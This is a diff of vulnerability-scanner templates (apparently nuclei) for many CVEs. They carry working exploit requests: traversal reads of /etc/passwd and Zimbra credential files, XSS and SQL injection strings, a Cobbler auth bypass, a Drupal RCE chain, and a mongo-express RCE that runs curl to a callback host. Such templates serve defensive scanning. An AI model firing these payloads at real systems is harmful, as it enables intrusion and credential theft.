+  description: Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2013-7091
+    - https://www.exploit-db.com/exploits/30085
+    - https://www.exploit-db.com/exploits/30472
+  tags: cve,cve2013,zimbra,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
+      - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        words:
+          - "zimbra_server_hostname"
+          - "zimbra_ldap_userdn"
+          - "zimbra_ldap_password"
+          - "ldap_postfix_password"
+          - "ldap_amavis_password"
+          - "ldap_nginx_password"
+          - "mysql_root_password"
+        condition: or
+
+      - type: regex
+        regex:
+          - "root=.*:0:0"

cves/2014/CVE-2014-4535.yaml

@@ -18,7 +18,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+      - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
     matchers-condition: and
     matchers:

cves/2014/CVE-2014-4544.yaml

@@ -18,7 +18,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
+      - "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
 
     matchers-condition: and
     matchers:

cves/2014/CVE-2014-4550.yaml

@@ -18,7 +18,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
+      - "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
 
     matchers-condition: and
     matchers:
@@ -34,4 +34,4 @@ requests:
 
       - type: status
         status:
-          - 200
+          - 200

cves/2014/CVE-2014-4558.yaml

@@ -18,7 +18,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
+      - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
 
     matchers-condition: and
     matchers:

cves/2014/CVE-2014-4561.yaml

@@ -18,7 +18,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+      - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
     matchers-condition: and
     matchers:

cves/2014/CVE-2014-4592.yaml

@@ -18,7 +18,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+      - "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
     matchers-condition: and
     matchers:
@@ -34,4 +34,4 @@ requests:
 
       - type: status
         status:
-          - 200
+          - 200

cves/2014/CVE-2014-8682.yaml

@@ -5,16 +5,19 @@ info:
   author: dhiyaneshDK
   severity: high
   description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
+  remediation: Upgrade to a supported version of Gog.
   reference:
-    - http://www.securityfocus.com/bid/71187
     - http://seclists.org/fulldisclosure/2014/Nov/33
     - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
-    - http://gogs.io/docs/intro/change_log.html
     - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
     - http://www.exploit-db.com/exploits/35238
     - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
-    - http://www.securityfocus.com/archive/1/533995/100/0/threaded
   tags: cve,cve2014,sqli,gogs
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2014-8682
+    cwe-id: CWE-89
   metadata:
     shodan-query: 'title:"Sign In - Gogs"'
 
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/02/04

cves/2016/CVE-2016-10940.yaml

@@ -0,0 +1,45 @@
+id: CVE-2016-10940
+
+info:
+  name: The zm-gallery plugin 1.0 for WordPress SQLI
+  author: cckuailong
+  severity: high
+  description: The zm-gallery plugin 1.0 for WordPress has SQL injection via the order parameter.
+  reference:
+    - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6
+    - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-10940
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2016-10940
+    cwe-id: CWE-89
+  tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "<th scope=\"row\" class=\"check-column\">")'
+          - '!contains(body_3, "<th scope=\"row\" class=\"check-column\">")'
+        condition: and

cves/2016/CVE-2016-10956.yaml

@@ -30,3 +30,4 @@ requests:
       - type: status
         status:
           - 200
+          - 500

cves/2016/CVE-2016-3978.yaml

@@ -0,0 +1,27 @@
+id: CVE-2016-3978
+
+info:
+  name: FortiOS (Fortinet) - Open Redirect and XSS
+  author: 0x_Akoko
+  severity: medium
+  description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
+  reference:
+    - https://seclists.org/fulldisclosure/2016/Mar/68
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-3978
+  tags: cve,cve2016,redirect,fortinet,fortios
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2016-3978
+    cwe-id: CWE-79
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login?redir=http://www.example.com'
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

cves/2017/CVE-2017-5638.yaml

@@ -3,7 +3,7 @@ info:
   author: Random_Robbie
   name: Apache Struts2 RCE
   severity: critical
-  description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
+  description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
   tags: cve,cve2017,struts,rce,apache
   reference: https://github.com/mazen160/struts-pwn
   classification:
@@ -25,4 +25,4 @@ requests:
       - type: word
         words:
           - "X-Hacker: Bounty Plz"
-        part: header
+        part: header

cves/2017/CVE-2017-7391.yaml

@@ -1,7 +1,7 @@
 id: CVE-2017-7391
 
 info:
-  name: Magmi – Cross-Site Scripting v.0.7.22
+  name: Magmi Cross-Site Scripting v.0.7.22
   author: pikpikcu
   severity: medium
   description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
@@ -25,12 +25,13 @@ requests:
       - type: status
         status:
           - 200
-      - type: word
-        words:
-          - '"><script>alert(document.domain);</script><'
-        part: body
 
       - type: word
+        part: body
+        words:
+          - '"><script>alert(document.domain);</script><'
+
+      - type: word
+        part: header
         words:
           - "text/html"
-        part: header

cves/2017/CVE-2017-9805.yaml

@@ -4,7 +4,8 @@ info:
   name: Apache Struts2 S2-052 RCE
   author: pikpikcu
   severity: high
-  description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.
+  description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to Remote Code Execution when deserializing XML payloads.
+  remediation: Apply the appropriate patch.
   reference:
     - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
     - https://struts.apache.org/docs/s2-052.html
@@ -93,3 +94,5 @@ requests:
       - type: status
         status:
           - 500
+
+# Enhanced by mp on 2022/02/04

cves/2018/CVE-2018-1000226.yaml

@@ -0,0 +1,60 @@
+id: CVE-2018-1000226
+
+info:
+  name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass
+  author: c-sh0
+  severity: critical
+  reference:
+    - https://github.com/cobbler/cobbler/issues/1916
+    - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2018-1000226
+    cwe-id: CWE-732
+  tags: cve,cve2018,cobbler,auth-bypass
+
+requests:
+  - raw:
+      - |
+        POST {{BaseURL}}/cobbler_api HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <?xml version='1.0'?>
+        <methodCall>
+          <methodName>_CobblerXMLRPCInterface__make_token</methodName>
+          <params>
+            <param>
+              <value>
+                <string>cobbler</string>
+              </value>
+            </param>
+          </params>
+        </methodCall>
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "Content-Type: text/xml"
+
+      - type: word
+        part: body
+        words:
+          - "<methodResponse>"
+
+      - type: dsl
+        dsl:
+          - "!contains(tolower(body), '<name>faultCode</name>')"
+
+      - type: regex
+        part: body
+        regex:
+          - "(.*[a-zA-Z0-9].+==)</string></value>"

cves/2018/CVE-2018-10818.yaml

@@ -4,7 +4,7 @@ info:
   name: LG NAS Devices - Remote Code Execution (Unauthenticated)
   author: gy741
   severity: critical
-  description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
+  description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter.
   reference:
     - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
     - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247

cves/2018/CVE-2018-10822.yaml

@@ -4,7 +4,7 @@ info:
   name: D-Link Routers - Directory Traversal
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
+  description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request.
   reference:
     - https://www.exploit-db.com/exploits/45678
     - https://nvd.nist.gov/vuln/detail/CVE-2018-10822

cves/2018/CVE-2018-1273.yaml

@@ -10,7 +10,7 @@ info:
     caused by improper neutralization of special elements.
     An unauthenticated remote malicious user (or attacker) can supply
     specially crafted request parameters against Spring Data REST backed HTTP resources
-    or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack.
+    or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
   reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
   tags: cve,cve2018,vmware,rce,spring
   classification:

cves/2018/CVE-2018-13380.yaml

@@ -2,34 +2,38 @@ id: CVE-2018-13380
 
 info:
   name: Fortinet FortiOS Cross-Site Scripting
-  author: shelld3v
+  author: shelld3v,AaronChen0
   severity: medium
   description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
-  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
+  reference:
-  tags: cve,cve2018,fortios,xss,fortinet
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-13380
+    - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.10
     cve-id: CVE-2018-13380
     cwe-id: CWE-79
+  tags: cve,cve2018,fortios,xss,fortinet
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
+      - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
       - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
 
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "<svg/onload=alert(1337)>"
-        part: body
+          - "<script>alert(1337)</script>"
+        condition: or
 
       - type: word
+        part: header
         words:
           - "application/json"
-        part: header
         negative: true
 
       - type: status

cves/2018/CVE-2018-17254.yaml

@@ -1,9 +1,10 @@
 id: CVE-2018-17254
 
 info:
-  name: Joomla JCK Editor SQL Injection
+  name: Joomla! JCK Editor SQL Injection
   author: Suman_Kar
   description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
+  remediation: Update or remove the affected plugin.
   severity: critical
   tags: joomla,sqli,cve,cve2018
   reference:
@@ -27,3 +28,5 @@ requests:
         part: body
         words:
           - "nuclei-template"
+
+# Enhanced by mp on 2022/02/08

cves/2018/CVE-2018-18925.yaml

@@ -0,0 +1,35 @@
+id: CVE-2018-18925
+info:
+  name: Gogs - Remote Code Execution (CVE-2018-18925)
+  author: princechaddha
+  severity: critical
+  description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.
+  reference:
+    - https://www.anquanke.com/post/id/163575
+    - https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925
+    - https://nvd.nist.gov/vuln/detail/cve-2018-18925
+  remediation: This issue will be fixed by updating to the latest version of Gogs
+  tags: cve,cve2018,gogs,lfi,rce
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2018-18925
+    cwe-id: CWE-384
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: lang=en-US; i_like_gogits=../../../../etc/passwd;
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: lang=en-US; i_like_gogits=../../../../etc/dummy;
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "<meta name=\"author\" content=\"Gogs\" />")'

cves/2018/CVE-2018-7602.yaml

@@ -0,0 +1,74 @@
+id: CVE-2018-7602
+info:
+  name: Drupal Remote Code Execution Vulnerability
+  author: princechaddha
+  severity: critical
+  description: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
+  reference:
+    - https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-7602
+  tags: cve,cve2018,drupal,authenticated
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2018-7602
+
+requests:
+  - raw:
+      - |
+        POST /?q=user%2Flogin HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        form_id=user_login&name={{username}}&pass={{password}}&op=Log+in
+
+      - |
+        GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account
+
+      - |
+        POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        form_build_id={{form_build_id}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        words:
+          - 'CVE-2018-7602-POC'
+
+    extractors:
+      - type: regex
+        part: body
+        name: userid
+        internal: true
+        group: 1
+        regex:
+          - '<meta about="([/a-z0-9]+)" property="foaf'
+
+      - type: regex
+        part: body
+        name: form_token
+        internal: true
+        group: 1
+        regex:
+          - '<input type="hidden" name="form_token" value="(.*)" />'
+
+      - type: regex
+        part: body
+        name: form_build_id
+        internal: true
+        group: 1
+        regex:
+          - '<input type="hidden" name="form_build_id" value="(.*)" />'

cves/2019/CVE-2019-10758.yaml

@@ -0,0 +1,32 @@
+id: CVE-2019-10758
+info:
+  name: Mongo-Express Remote Code Execution - CVE-2019-10758
+  author: princechaddha
+  severity: critical
+  description: mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.
+  reference:
+    - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-10758
+  remediation: This issue will be fixed by updating to the latest version of mongo-express
+  metadata:
+    shodan-query: http.title:"Mongo Express"
+  tags: cve,cve2019,mongo,mongo-express
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.90
+    cve-id: CVE-2019-10758
+
+requests:
+  - raw:
+      - |
+        POST /checkValid HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic YWRtaW46cGFzcw==
+        Content-Type: application/x-www-form-urlencoded
+
+        document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}")
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"

cves/2019/CVE-2019-12725.yaml

@@ -4,12 +4,10 @@ info:
   name: Zeroshell 3.9.0 Remote Command Execution
   author: dwisiswant0
   severity: critical
-  description: |
+  description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
-    This template exploits an unauthenticated command injection vulnerability
+  remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
-    found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url.
-    As sudo is configured to execute /bin/tar without a password (NOPASSWD)
-    it is possible to run root commands using the "checkpoint" tar options.
   reference:
+    - https://www.zeroshell.org/new-release-and-critical-vulnerability/
     - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
     - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
   tags: cve,cve2019,rce,zeroshell
@@ -30,4 +28,6 @@ requests:
           - 200
       - type: regex
         regex:
-          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
+          - "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+"
+
+# Enhanced by mp on 2022/02/04

cves/2019/CVE-2019-13396.yaml

@@ -0,0 +1,49 @@
+id: CVE-2019-13396
+info:
+  name: FlightPath Local File Inclusion
+  author: 0x_Akoko,daffainfo
+  severity: high
+  description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
+  reference:
+    - https://www.exploit-db.com/exploits/47121
+    - https://www.cvedetails.com/cve/CVE-2019-13396/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-13396
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2019-13396
+    cwe-id: CWE-22
+  tags: cve,cve2019,flightpath,lfi
+
+requests:
+  - raw:
+      - |
+        GET /login HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: token
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "idden' name='form_token' value='([a-z0-9]+)'>"

cves/2019/CVE-2019-13462.yaml

@@ -1,11 +1,12 @@
 id: CVE-2019-13462
 
 info:
-  name: Lansweeper through 7.1.115.4 unauthenticated SQL injection
+  name: Lansweeper Unauthenticated SQL Injection
   author: divya_mudgal
   severity: critical
   reference: https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
-  description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameters to /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI.
+  description: Lansweeper before 7.1.117.4 allows unauthenticated SQL injection.
+  remediation: Upgrade to the latest version.
   tags: cve,cve2019,sqli,lansweeper
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
@@ -34,3 +35,5 @@ requests:
       - type: status
         status:
           - 500
+
+# Enhanced by mp on 2022/02/04

cves/2019/CVE-2019-9618.yaml

@@ -31,3 +31,4 @@ requests:
       - type: status
         status:
           - 200
+          - 500

cves/2020/CVE-2020-12447.yaml

@@ -0,0 +1,31 @@
+id: CVE-2020-12447
+info:
+  name: Onkyo TX-NR585 Web Interface - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal
+  reference:
+    - https://blog.spookysec.net/onkyo-lfi
+    - https://www.cvedetails.com/cve/CVE-2020-12447
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-12447
+    cwe-id: CWE-22
+  tags: cve,cve2020,onkyo,lfi,traversal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2020/CVE-2020-13483.yaml

@@ -2,34 +2,40 @@ id: CVE-2020-13483
 
 info:
   name: Bitrix24 through 20.0.0 allows XSS
-  author: pikpikcu
+  author: pikpikcu,3th1c_yuk1
   severity: medium
-  reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
   description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
-  tags: cve,cve2020,xss,bitrix
+  reference:
+    - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
+    - https://twitter.com/brutelogic/status/1483073170827628547
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.10
     cve-id: CVE-2020-13483
     cwe-id: CWE-79
+  tags: cve,cve2020,xss,bitrix
 
 requests:
   - method: GET
     path:
+      - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
       - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
 
       - type: word
-        words:
-          - "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
         part: body
+        words:
+          - '<a href="/*">*/)});function __MobileAppList(){alert(1)}//'
+          - "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
+        condition: or
 
       - type: word
+        part: header
         words:
           - text/html
